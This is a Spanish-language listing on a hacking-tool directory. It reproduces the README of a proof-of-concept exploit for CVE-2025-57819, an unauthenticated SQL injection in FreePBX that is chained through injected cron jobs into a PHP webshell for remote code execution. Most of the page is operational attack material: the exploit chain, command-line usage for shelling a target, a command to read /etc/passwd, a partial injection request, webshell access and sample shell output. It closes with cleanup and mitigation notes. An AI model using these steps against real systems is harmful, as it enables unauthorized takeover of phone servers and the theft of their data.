Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-57819-POC — FreePBX inyección SQL no autenticada que conduce a ejecución remota de código, FreePBX 15 (inferior a 15.0.66), 16 (inferior a 16.0.89), 17 (inferior a 17.0.3). La vulnerabilidad se encuentra en el módulo comercial "endpoint", debido a un filtrado deficiente de la entrada del usuario, permite a atacantes no autenticados eludir los privilegios de administrador, ejecutar inyección SQL y, finalmente, lograr ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/neobee714/cve-2025-57819-poc
Escáneres de VulnerabilidadesAnálisis de CódigoExplotaciónSeguridad WebAprendizaje y Educación
GitHubneobee714/cve-2025-57819-poc

CVE-2025-57819-POC

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

hace 1 mesAún no revisado

FreePBX inyección SQL no autenticada que conduce a ejecución remota de código, FreePBX 15 (inferior a 15.0.66), 16 (inferior a 16.0.89), 17 (inferior a 17.0.3). La vulnerabilidad se encuentra en el módulo comercial "endpoint", debido a un filtrado deficiente de la entrada del usuario, permite a atacantes no autenticados eludir los privilegios de administrador, ejecutar inyección SQL y, finalmente, lograr ejecución remota de código.

Compartir

CVE-2025-57819 — Inyección SQL en FreePBX → PoC de RCE

CVE-2025-57819 es una vulnerabilidad crítica de inyección SQL en FreePBX que permite a un atacante no autenticado lograr la ejecución remota de código encadenando una inyección SQL con la inyección de trabajos cron.

⚠️ Aviso legal: Este repositorio es solo para pruebas de seguridad autorizadas y fines educativos. El uso no autorizado de este exploit contra sistemas que no posees o para los que no tienes permiso explícito de prueba es ilegal. El autor no es responsable de ningún uso indebido o daño.


Resumen de la vulnerabilidad

CampoDetalle
CVECVE-2025-57819
Producto afectadoFreePBX (pre-autenticación)
Tipo de vulnerabilidadInyección SQL (consultas apiladas)
ImpactoEjecución remota de código (RCE)
Vector de ataqueRed (HTTP GET)
Autenticación requerida❌ Ninguna

Cadena del exploit

root@kitploit:~
┌────────────────────────────────────────────────────────────────┐
│ 1. SQL Injection                                               │
│    POST /admin/ajax.php?brand= → stacked query                 │
│    INSERT INTO cron_jobs …                                     │
├────────────────────────────────────────────────────────────────┤
│ 2. Cron Job Injection                                          │
│    Malicious cron job writes base64-decoded PHP webshell       │
│    to /var/www/html/shell.php                                  │
├────────────────────────────────────────────────────────────────┤
│ 3. WebShell Access                                             │
│    GET /shell.php?cmd=<command> → arbitrary code execution     │
└────────────────────────────────────────────────────────────────┘

Cómo funciona

  1. El endpoint /admin/ajax.php procesa el parámetro brand sin una sanitización adecuada, lo que permite consultas SQL apiladas.
  2. El atacante inyecta una sentencia INSERT INTO cron_jobs que programa un comando malicioso cada minuto.
  3. El trabajo cron decodifica una webshell PHP codificada en base64 y la escribe en la raíz web.
  4. Una vez escrita, el atacante puede ejecutar comandos arbitrarios del sistema a través de la webshell.

Inicio rápido

root@kitploit:~
# Clone
git clone [email protected]:Neobee714/CVE-2025-57819-POC.git
cd CVE-2025-57819-POC

# Install dependency
pip install requests

# Basic usage
python exploit.py <target>

# Drop into interactive shell after injection
python exploit.py <target> --shell

# Execute a single command
python exploit.py <target> --cmd "cat /etc/passwd"

Uso

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [--shell] [--cmd CMD]
                  [--param PARAM] [--no-wait] [-v]
                  target

CVE-2025-57819 – FreePBX SQLi → Cron → WebShell

positional arguments:
  target                target hostname or IP (with optional scheme)

options:
  -h, --help            show this help message and exit
  -p, --port PORT       port (default: 80/443)
  --shell               drop into interactive shell after injection
  --cmd CMD             execute a single command via the webshell
  --param PARAM         webshell query-string parameter (default: cmd)
  --no-wait             skip the webshell-verification poll
  -v, -vv               increase verbosity (-v info, -vv debug)

Ejemplos

root@kitploit:~
# Target with default HTTP port
python exploit.py connected.htb

# Target with custom port
python exploit.py 10.10.11.100 -p 8080

# Inject, verify, and drop into interactive shell
python exploit.py 10.10.11.100 --shell

# Inject and run a single command
python exploit.py connected.htb --cmd "whoami"

# Skip the verification poll (if you already know the shell is live)
python exploit.py connected.htb --no-wait --cmd "id"

# Verbose output for debugging
python exploit.py connected.htb -vv --shell

Shell interactivo

Al usar --shell, el script abre una pseudo-terminal:

root@kitploit:~
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
[*] Shell session ended.

Escribe exit (o Ctrl-C, Ctrl-D) para salir de la sesión.


Verificación manual

Si prefieres los pasos manuales, el exploit hace tres cosas:

Paso 1 – Inyectar el trabajo cron

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=x&model=model&brand=x'%20%3BINSERT%20INTO%20cron_jobs%20...

Paso 2 – Esperar ~60 segundos a que se ejecute cron

El trabajo cron inyectado (* * * * *) se ejecuta cada minuto y escribe la webshell.

Paso 3 – Acceder a la webshell

root@kitploit:~
GET /shell.php?cmd=id

Limpieza

Después de las pruebas, elimina la webshell y la entrada del trabajo cron:

root@kitploit:~
DELETE FROM cron_jobs WHERE command LIKE '%base64%';

Luego elimina /var/www/html/shell.php del sistema de archivos.


Versiones afectadas

  • Versiones de FreePBX anteriores al parche del proveedor
  • Sistemas donde /admin/ajax.php es accesible sin autenticación

Mitigación

  • Aplica inmediatamente el parche de seguridad proporcionado por el proveedor
  • Restringe el acceso de red a la interfaz de administración de FreePBX
  • Asegúrate de que el usuario de la base de datos de FreePBX tenga privilegios mínimos (defensa en profundidad)

Referencias

  • FreePBX Security Advisories
  • OWASP SQL Injection

Licencia

Este proyecto se proporciona únicamente con fines educativos y de investigación de seguridad defensiva. Consulta el aviso legal al principio de este documento.

Descargar herramienta